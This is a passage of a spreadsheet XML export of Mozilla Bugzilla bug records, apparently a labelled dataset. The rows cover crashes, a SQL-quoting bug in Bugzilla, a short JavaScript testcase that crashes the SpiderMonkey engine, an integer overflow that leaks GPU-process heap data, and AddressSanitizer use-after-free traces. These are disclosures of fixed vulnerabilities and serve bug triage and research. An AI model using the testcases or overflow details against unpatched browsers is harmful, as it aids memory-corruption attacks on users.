    #22 0x4dbbf2 in content_process_main(int, char**) ipc/contentproc/plugin-container.cpp:236:19
    #23 0x7f616b8c2ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
Thread T24 (MediaPl~back #3) created by T22 (MediaPl~back #2) here:
    #0 0x430269 in pthread_create _asan_rtl_
    #1 0x7f617bc9ddbf in _PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:453:14
    #2 0x7f617bc9d9ea in PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:544:12
    #3 0x7f616e4bb016 in nsThread::Init() xpcom/threads/nsThread.cpp:470:19
    #4 0x7f616e4c0d1f in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) xpcom/threads/nsThreadManager.cpp:253:17
    #5 0x7f616e4c248d in nsThreadPool::PutEvent(nsIRunnable*) xpcom/threads/nsThreadPool.cpp:102:3
    #6 0x7f616e4c3f8a in nsThreadPool::Dispatch(nsIRunnable*, unsigned int) xpcom/threads/nsThreadPool.cpp:262:5
    #7 0x7f6172f27dce in mozilla::MediaTaskQueue::DispatchLocked(already_AddRefed&lt;nsIRunnable&gt;, mozilla::MediaTaskQueue::DispatchMode, mozilla::AbstractThread::DispatchFailureHandling, mozilla::AbstractThread::DispatchReason) dom/media/MediaTaskQueue.cpp:65:17
    #8 0x7f6172e8b4ff in mozilla::MediaTaskQueue::Dispatch(already_AddRefed&lt;nsIRunnable&gt;, mozilla::AbstractThread::DispatchFailureHandling, mozilla::AbstractThread::DispatchReason) objdir-ff-asan/dist/include/MediaTaskQueue.h:52:19
    #9 0x7f6172d9bcc8 in mozilla::AutoTaskDispatcher::~AutoTaskDispatcher() dom/media/TaskDispatcher.h:233:5
    #10 0x7f6172f29980 in mozilla::MediaTaskQueue::Runner::Run() objdir-ff-asan/dist/include/MediaTaskQueue.h:152:5
    #11 0x7f616e4c353e in nsThreadPool::Run() xpcom/threads/nsThreadPool.cpp:221:7
    #12 0x7f616e4c3b1c in non-virtual thunk to nsThreadPool::Run() xpcom/threads/nsThreadPool.cpp:151:15
    #13 0x7f616e4bd1b6 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:848:7
    #14 0x7f616e53419c in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:265:10
    #15 0x7f616ede4906 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:326:20
    #16 0x7f616ed6e6a1 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:234:3
    #17 0x7f616e4b9c51 in nsThread::ThreadFunc(void*) xpcom/threads/nsThread.cpp:360:5
    #18 0x7f617bca0ffa in _pt_root nsprpub/pr/src/pthreads/ptthread.c:212:5
    #19 0x7f617c2e5181 in start_thread /build/buildd/eglibc-2.19/nptl/pthread_create.c:312
Shadow bytes around the buggy address:
  0x0c3e80005c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3e80005c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3e80005c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3e80005c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3e80005c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0c3e80005c50: 00 00 00[07]fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3e80005c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3e80005c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3e80005c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3e80005c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3e80005ca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5811==ABORTING</t>
        </is>
      </c>
      <c r="X790" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="791">
      <c r="A791" t="n">
        <v>214290</v>
      </c>
      <c r="B791" t="inlineStr">
        <is>
          <t>2003-07-29 06:33:45 -0700</t>
        </is>
      </c>
      <c r="C791" t="inlineStr">
        <is>
          <t>collectstats.pl does not add \'s to SQL queries for quotes</t>
        </is>
      </c>
      <c r="D791" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:36 -0800</t>
        </is>
      </c>
      <c r="E791" t="n">
        <v>1</v>
      </c>
      <c r="F791" t="n">
        <v>1</v>
      </c>
      <c r="G791" t="n">
        <v>4</v>
      </c>
      <c r="H791" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I791" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J791" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K791" t="inlineStr">
        <is>
          <t>2.16.3</t>
        </is>
      </c>
      <c r="L791" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M791" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N791" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O791" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P791" t="inlineStr">
        <is>
          <t>[fixed in 2.16.4] [does not affect trunk]</t>
        </is>
      </c>
      <c r="Q791" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R791" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S791" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T791" t="n">
        <v>1</v>
      </c>
      <c r="U791" t="n">
        <v>0</v>
      </c>
      <c r="V791" t="n">
        <v>10</v>
      </c>
      <c r="W791" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Opera 7.11  [en]
Build Identifier: N/A
Collectstats.pl does not parse out quotes (i.e. ') in SQL queries and add a \ to 
them. This is a security risk via SQL injection.
Reproducible: Always
Steps to Reproduce:
1. Add a bug with a title that contains a '
2. Setup collectstats.pl to run nightly
3. Wait for the fun
Actual Results:  
DBD::mysql::st execute failed: You have an error in your SQL syntax.  Check the 
manual that corresponds to your MySQL server version for the right syntax to use 
near 's Coolness'' at line 1 at globals.pl line 271.
[Wed Jul 23 00:05:02 2003] collectstats.pl: DBD::mysql::st execute failed: You 
have an error in your SQL syntax.  Check the manual that corresponds to your 
MySQL server version for the right syntax to use near 's Coolness'' at line 1 at 
globals.pl line 271.
[Wed Jul 23 00:05:02 2003] collectstats.pl: select count(bug_status) from bugs 
where bug_status='NEW' and product='Scott's Coolness': You have an error in your 
SQL syntax.  Check the manual that corresponds to your MySQL server version for 
the right syntax to use near 's Coolness'' at line 1 at globals.pl line 276.
./collectstats.pl: data/mining/-All-, Permission deniedContent-type: text/html
&lt;H1&gt;Software error:&lt;/H1&gt;
&lt;PRE&gt;select count(bug_status) from bugs where bug_status='NEW' and 
product='Scott's Coolness': You have an error in your SQL syntax.  Check the 
manual that corresponds to your MySQL server version for the right syntax to use 
near 's Coolness'' at line 1 at globals.pl line 276.
&lt;/PRE&gt;
&lt;P&gt;
For help, please send mail to this site's webmaster, giving this error message 
and the time and date of the error.
Expected Results:  
Worked, damnit.</t>
        </is>
      </c>
      <c r="X791" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="792">
      <c r="A792" t="n">
        <v>1042567</v>
      </c>
      <c r="B792" t="inlineStr">
        <is>
          <t>2014-07-23 02:51:48 -0700</t>
        </is>
      </c>
      <c r="C792" t="inlineStr">
        <is>
          <t>Crash [@ js::FetchName] or Assertion failure: shape-&gt;hasSlot(), at vm/Interpreter-inl.h</t>
        </is>
      </c>
      <c r="D792" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:59 -0700</t>
        </is>
      </c>
      <c r="E792" t="n">
        <v>1</v>
      </c>
      <c r="F792" t="n">
        <v>1</v>
      </c>
      <c r="G792" t="n">
        <v>3</v>
      </c>
      <c r="H792" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I792" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J792" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K792" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L792" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M792" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N792" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O792" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P792" t="inlineStr">
        <is>
          <t>[jsbugmon:origRev=dc352a7bf234,testComment=9,update][adv-main34+][adv-esr31.3+][b2g-adv-main2.2-]</t>
        </is>
      </c>
      <c r="Q792" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R792" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S792" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T792" t="n">
        <v>1</v>
      </c>
      <c r="U792" t="n">
        <v>0</v>
      </c>
      <c r="V792" t="n">
        <v>43</v>
      </c>
      <c r="W792" t="inlineStr">
        <is>
          <t>Created attachment 8460797
debug and opt stacks
x = (function() {})
__proto__ = x
Object.freeze(wrap(x))
arguments
asserts js debug shell on m-c changeset 82df3654cd80 with --no-baseline --ion-offthread-compile=off --ion-eager at Assertion failure: shape-&gt;hasSlot(), at vm/Interpreter-inl.h and crashes js opt shell at js::FetchName
My configure flags are: (opt)
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin12.5.0 --disable-debug --enable-optimize --enable-gczeal --enable-debug-symbols --disable-tests --enable-more-deterministic --with-ccache --enable-threadsafe
Debug:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin12.5.0 --enable-debug --enable-optimize --enable-gczeal --enable-debug-symbols --disable-tests --enable-more-deterministic --with-ccache --enable-threadsafe
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   https://hg.mozilla.org/mozilla-central/rev/e0741f7815ff
user:        Jason Orendorff
date:        Fri Apr 25 16:11:01 2014 -0500
summary:     Bug 547140, part 2 - Remove flags argument from JS_GetPropertyDescriptor and friends. r=Waldo.
Setting s-s and sec-critical as a start because this seems to access a weird memory address 0x109722000 in the opt shell.
Jason, is bug 547140 likely related?</t>
        </is>
      </c>
      <c r="X792" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="793">
      <c r="A793" t="n">
        <v>464174</v>
      </c>
      <c r="B793" t="inlineStr">
        <is>
          <t>2008-11-10 20:50:36 -0800</t>
        </is>
      </c>
      <c r="C793" t="inlineStr">
        <is>
          <t>The fix in bug 451680 does not fix &lt;field&gt;</t>
        </is>
      </c>
      <c r="D793" t="inlineStr">
        <is>
          <t>2009-01-07 09:32:24 -0800</t>
        </is>
      </c>
      <c r="E793" t="n">
        <v>1</v>
      </c>
      <c r="F793" t="n">
        <v>1</v>
      </c>
      <c r="G793" t="n">
        <v>3</v>
      </c>
      <c r="H793" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I793" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J793" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K793" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L793" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M793" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N793" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O793" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P793" t="inlineStr">
        <is>
          <t>[sg:high] fixed in 1.8.1.x by bug 451680</t>
        </is>
      </c>
      <c r="Q793" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R793" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S793" t="inlineStr">
        <is>
          <t>mozilla1.9.1b3</t>
        </is>
      </c>
      <c r="T793" t="n">
        <v>1</v>
      </c>
      <c r="U793" t="n">
        <v>0</v>
      </c>
      <c r="V793" t="n">
        <v>17</v>
      </c>
      <c r="W793" t="inlineStr">
        <is>
          <t>The fix in bug 451680 does not fix &lt;field&gt;.</t>
        </is>
      </c>
      <c r="X793" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="794">
      <c r="A794" t="n">
        <v>1846694</v>
      </c>
      <c r="B794" t="inlineStr">
        <is>
          <t>2023-08-02 00:28:24 -0700</t>
        </is>
      </c>
      <c r="C794" t="inlineStr">
        <is>
          <t>Integer Overflow in RecordedSourceSurfaceCreation</t>
        </is>
      </c>
      <c r="D794" t="inlineStr">
        <is>
          <t>2024-05-30 11:13:22 -0700</t>
        </is>
      </c>
      <c r="E794" t="n">
        <v>1</v>
      </c>
      <c r="F794" t="n">
        <v>1</v>
      </c>
      <c r="G794" t="n">
        <v>3</v>
      </c>
      <c r="H794" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I794" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J794" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K794" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L794" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M794" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N794" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O794" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P794" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [adv-main117+] [adv-esr115.2+] [adv-esr102.15+]</t>
        </is>
      </c>
      <c r="Q794" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R794" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S794" t="inlineStr">
        <is>
          <t>118 Branch</t>
        </is>
      </c>
      <c r="T794" t="n">
        <v>0</v>
      </c>
      <c r="U794" t="n">
        <v>0</v>
      </c>
      <c r="V794" t="n">
        <v>20</v>
      </c>
      <c r="W794" t="inlineStr">
        <is>
          <t>Created attachment 9346883
patch.diff
An integer overflow occurs in RecordedSourceSurfaceCreation::RecordedSourceSurfaceCreation[1], which results in a heap buffer overflow[2]. 
ReturnWrite allows attacker to leak GPU process's heap data to the content process. 
The provided patch.diff file simulates a compromised content process that may potentially cause the GPU process to crash. To reproduce the vulnerability, apply the patch and open the index.html.
[1] https://searchfox.org/mozilla-central/source/gfx/2d/RecordedEventImpl.h#3215
[2] https://searchfox.org/mozilla-central/source/gfx/layers/RecordedCanvasEventImpl.h#364</t>
        </is>
      </c>
      <c r="X794" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="795">
      <c r="A795" t="n">
        <v>665403</v>
      </c>
      <c r="B795" t="inlineStr">
        <is>
          <t>2011-06-19 18:58:31 -0700</t>
        </is>
      </c>
      <c r="C795" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.2 Beta 1</t>
        </is>
      </c>
      <c r="D795" t="inlineStr">
        <is>
          <t>2011-06-28 11:36:39 -0700</t>
        </is>
      </c>
      <c r="E795" t="n">
        <v>1</v>
      </c>
      <c r="F795" t="n">
        <v>1</v>
      </c>
      <c r="G795" t="n">
        <v>2</v>
      </c>
      <c r="H795" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I795" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J795" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K795" t="inlineStr">
        <is>
          <t>SeaMonkey 2.2 Branch</t>
        </is>
      </c>
      <c r="L795" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M795" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N795" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O795" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P795" t="inlineStr"/>
      <c r="Q795" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R795" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S795" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T795" t="n">
        <v>1</v>
      </c>
      <c r="U795" t="n">
        <v>0</v>
      </c>
      <c r="V795" t="n">
        <v>3</v>
      </c>
      <c r="W795" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #655650 +++
+++ This bug was initially created as a clone of Bug #647928 +++</t>
        </is>
      </c>
      <c r="X795" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="796">
      <c r="A796" t="n">
        <v>393440</v>
      </c>
      <c r="B796" t="inlineStr">
        <is>
          <t>2007-08-23 11:15:19 -0700</t>
        </is>
      </c>
      <c r="C796" t="inlineStr">
        <is>
          <t>Improve discoverability of QMO extension</t>
        </is>
      </c>
      <c r="D796" t="inlineStr">
        <is>
          <t>2018-10-15 10:43:38 -0700</t>
        </is>
      </c>
      <c r="E796" t="n">
        <v>1</v>
      </c>
      <c r="F796" t="n">
        <v>1</v>
      </c>
      <c r="G796" t="n">
        <v>6</v>
      </c>
      <c r="H796" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I796" t="inlineStr">
        <is>
          <t>Other Applications Graveyard</t>
        </is>
      </c>
      <c r="J796" t="inlineStr">
        <is>
          <t>QA Companion</t>
        </is>
      </c>
      <c r="K796" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L796" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M796" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N796" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O796" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P796" t="inlineStr"/>
      <c r="Q796" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R796" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S796" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T796" t="n">
        <v>1</v>
      </c>
      <c r="U796" t="n">
        <v>0</v>
      </c>
      <c r="V796" t="n">
        <v>7</v>
      </c>
      <c r="W796" t="inlineStr">
        <is>
          <t>On first installing the extension, I did not notice the QMO icon down in the bottom right corner of FFx until about 2 hours later (long after I gave up searching for it).
The very first thing I did was to go to Tools-&gt;AddOns and look for an extension preferences page, thinking that this might give me some clue to how the extension loads/looks/modifies firefox.  I don't know if there is something we can do there to help users figure it out or not.
One thing we could do, is change the default icon in the Add-Ons dialog to be the QMO icon, then at least once the users see the QMO icon in the corner, they will know what it is. Currently the icon in Tools-&gt;Add-Ons is the standard green puzzle piece.</t>
        </is>
      </c>
      <c r="X796" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="797">
      <c r="A797" t="n">
        <v>81692</v>
      </c>
      <c r="B797" t="inlineStr">
        <is>
          <t>2001-05-18 14:28:24 -0700</t>
        </is>
      </c>
      <c r="C797" t="inlineStr">
        <is>
          <t>Crash Backspacing in Addressing Widget of Compose Window</t>
        </is>
      </c>
      <c r="D797" t="inlineStr">
        <is>
          <t>2008-07-31 01:22:10 -0700</t>
        </is>
      </c>
      <c r="E797" t="n">
        <v>1</v>
      </c>
      <c r="F797" t="n">
        <v>1</v>
      </c>
      <c r="G797" t="n">
        <v>3</v>
      </c>
      <c r="H797" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I797" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J797" t="inlineStr">
        <is>
          <t>Composition</t>
        </is>
      </c>
      <c r="K797" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L797" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M797" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N797" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O797" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P797" t="inlineStr">
        <is>
          <t>fix in hand; have r=, sr=, a=; awaiting tree verifications</t>
        </is>
      </c>
      <c r="Q797" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R797" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S797" t="inlineStr">
        <is>
          <t>mozilla0.9.1</t>
        </is>
      </c>
      <c r="T797" t="n">
        <v>1</v>
      </c>
      <c r="U797" t="n">
        <v>0</v>
      </c>
      <c r="V797" t="n">
        <v>18</v>
      </c>
      <c r="W797" t="inlineStr">
        <is>
          <t>I crash when I (a) send a web page via email from Navigator *and* (b) backspace 
in the addressing widget of the compose window.
Running 2001-05-17-04 (commercial) on WinNT.
I can reproduce this about 75% of the time. It seems that following a particular 
order of steps is very important in reproducing this bug.
Steps to reproduce.
1. Launch MoJo.
2. Launch Mail (Tasks | Mail). Authenticate to email server when prompted. I'm 
using IMAP.
3. Go back to Navigator. Browse to a site - say, http://www.mozilla.org/
4. Send the web page via email (File | Send Page ...).
5. *As soon as you see the cursor* in the addressing widget in the email compose 
window, begin typing, and then - after you've typed about 5 characters - quickly 
start hitting the backspace key (like you made a mistake in your typing and want 
to correct it right away). 
Note - I have configured email addressing to run against my LDAP server at work.
Expected result: The text you have typed in the addressing widget is deleted, 
and the cursor backspaces.
Actual result: CRASH!!
Stack trace:
Trigger Type:  Program Crash 
Trigger Reason:  Access violation 
Thread ID: 203  
Call Stack:    (Signature = nsLDAPAutoCompleteSession::FinishAutoCompleteLookup 
8ed50941) 
nsLDAPAutoCompleteSession::FinishAutoCompleteLookup
[d:\builds\seamonkey\mozilla\xpfe\components\autocomplete\src\nsLDAPAutoComplete
Session.cpp, line 923]
nsLDAPAutoCompleteSession::OnLDAPSearchResult 
[d:\builds\seamonkey\mozilla\xpfe\components\autocomplete\src\nsLDAPAutoComplete
Session.cpp, line 601]
nsLDAPAutoCompleteSession::OnLDAPMessage 
[d:\builds\seamonkey\mozilla\xpfe\components\autocomplete\src\nsLDAPAutoComplete
Session.cpp, line 327]
Notes:
Seems to be crashing in LDAP code.
For more information, see Talkback incidents: 30630928 and 30631144 (identical 
stack traces).</t>
        </is>
      </c>
      <c r="X797" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="798">
      <c r="A798" t="n">
        <v>752902</v>
      </c>
      <c r="B798" t="inlineStr">
        <is>
          <t>2012-05-08 07:31:43 -0700</t>
        </is>
      </c>
      <c r="C798" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsSMILTimeValueSpec::IsEventBased</t>
        </is>
      </c>
      <c r="D798" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:03 -0700</t>
        </is>
      </c>
      <c r="E798" t="n">
        <v>1</v>
      </c>
      <c r="F798" t="n">
        <v>1</v>
      </c>
      <c r="G798" t="n">
        <v>3</v>
      </c>
      <c r="H798" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I798" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J798" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K798" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L798" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M798" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N798" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O798" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P798" t="inlineStr">
        <is>
          <t>[asan][sg:high][advisory-tracking+][qa?]</t>
        </is>
      </c>
      <c r="Q798" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R798" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S798" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T798" t="n">
        <v>1</v>
      </c>
      <c r="U798" t="n">
        <v>0</v>
      </c>
      <c r="V798" t="n">
        <v>29</v>
      </c>
      <c r="W798" t="inlineStr">
        <is>
          <t>Created attachment 621970
Testcase
Affects latest Aurora, Trunk
=================================================================
==26824== ERROR: AddressSanitizer heap-use-after-free on address 0x7f6d5ecb0b90 at pc 0x7f6d8e48de39 bp 0x7ffff4b4ca70 sp 0x7ffff4b4ca68
READ of size 4 at 0x7f6d5ecb0b90 thread T0
    #0 0x7f6d8e48de39 in nsSMILTimeValueSpec::IsEventBased() const firefox/aurora/content/smil/nsSMILTimeValueSpec.cpp:171
    #1 0x7f6d8e473023 in nsSMILTimedElement::EndHasEventConditions() const firefox/aurora/content/smil/nsSMILTimedElement.cpp:2291
    #2 0x7f6d8e45b1f7 in nsSMILTimedElement::GetNextInterval(nsSMILInterval const*, nsSMILInterval const*, nsSMILInstanceTime const*, nsSMILInterval&amp;) const firefox/aurora/content/smil/nsSMILTimedElement.cpp:1696
    #3 0x7f6d8e454302 in nsSMILTimedElement::UpdateCurrentInterval(bool) firefox/aurora/content/smil/nsSMILTimedElement.cpp:1998
    #4 0x7f6d8e4569f9 in nsSMILTimedElement::RemoveInstanceTimesForCreator(nsSMILTimeValueSpec const*, bool) firefox/aurora/content/smil/nsSMILTimedElement.cpp:484
    #5 0x7f6d8e48c069 in nsSMILTimeValueSpec::UnregisterFromReferencedElement(mozilla::dom::Element*) firefox/aurora/content/smil/nsSMILTimeValueSpec.cpp:307
    #6 0x7f6d8e48bcb2 in ~nsSMILTimeValueSpec firefox/aurora/content/smil/nsSMILTimeValueSpec.cpp:93
    #7 0x7f6d8e481942 in ~nsAutoPtr firefox/aurora/../../dist/include/nsAutoPtr.h:105
    #8 0x7f6d8e46cf13 in ~nsAutoPtr firefox/aurora/../../dist/include/nsAutoPtr.h:106
    #9 0x7f6d8e480913 in nsTArrayElementTraits&lt;nsAutoPtr&lt;nsSMILTimeValueSpec&gt; &gt;::Destruct(nsAutoPtr&lt;nsSMILTimeValueSpec&gt;*) firefox/aurora/../../dist/include/nsTArray.h:381
    #10 0x7f6d8e480578 in nsTArray&lt;nsAutoPtr&lt;nsSMILTimeValueSpec&gt;, nsTArrayDefaultAllocator&gt;::DestructRange(unsigned int, unsigned int) firefox/aurora/../../dist/include/nsTArray.h:1242
    #11 0x7f6d8e480007 in nsTArray&lt;nsAutoPtr&lt;nsSMILTimeValueSpec&gt;, nsTArrayDefaultAllocator&gt;::RemoveElementsAt(unsigned int, unsigned int) firefox/aurora/../../dist/include/nsTArray.h:964
    #12 0x7f6d8e46d03f in nsTArray&lt;nsAutoPtr&lt;nsSMILTimeValueSpec&gt;, nsTArrayDefaultAllocator&gt;::Clear() firefox/aurora/../../dist/include/nsTArray.h:975
    #13 0x7f6d8e46825c in nsSMILTimedElement::ClearSpecs(nsTArray&lt;nsAutoPtr&lt;nsSMILTimeValueSpec&gt;, nsTArrayDefaultAllocator&gt;&amp;, nsTArray&lt;nsRefPtr&lt;nsSMILInstanceTime&gt;, nsTArrayDefaultAllocator&gt;&amp;, bool (*)(nsSMILInstanceTime*)) firefox/aurora/content/smil/nsSMILTimedElement.cpp:1331
    #14 0x7f6d8e4611a0 in nsSMILTimedElement::UnsetEndSpec(bool (*)(nsSMILInstanceTime*)) firefox/aurora/content/smil/nsSMILTimedElement.cpp:904
    #15 0x7f6d8e465f36 in nsSMILTimedElement::UnsetAttr(nsIAtom*) firefox/aurora/content/smil/nsSMILTimedElement.cpp:854
    #16 0x7f6d8e337423 in nsSVGAnimationElement::UnsetAttr(int, nsIAtom*, bool) firefox/aurora/content/svg/content/src/nsSVGAnimationElement.cpp:411
    #17 0x7f6d8a157d03 in nsGenericElement::RemoveAttribute(nsAString_internal const&amp;) firefox/aurora/content/base/src/nsGenericElement.cpp:2746
    #18 0x7f6d8e2fd108 in nsSVGAnimateElement::RemoveAttribute(nsAString_internal const&amp;) firefox/aurora/content/svg/content/src/nsSVGAnimateElement.cpp:60
    #19 0x7f6d8e9b9aca in nsIDOMElement_RemoveAttribute(JSContext*, unsigned int, JS::Value*) firefox/aurora/objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:3961
    #20 0x7f6d97537821 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), js::CallArgs const&amp;) firefox/aurora/js/src/jscntxtinlines.h:314
    #21 0x7f6d9749e1cd in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) firefox/aurora/js/src/jsinterp.cpp:2757
    #22 0x7f6d9741e085 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) firefox/aurora/js/src/jsinterp.cpp:475
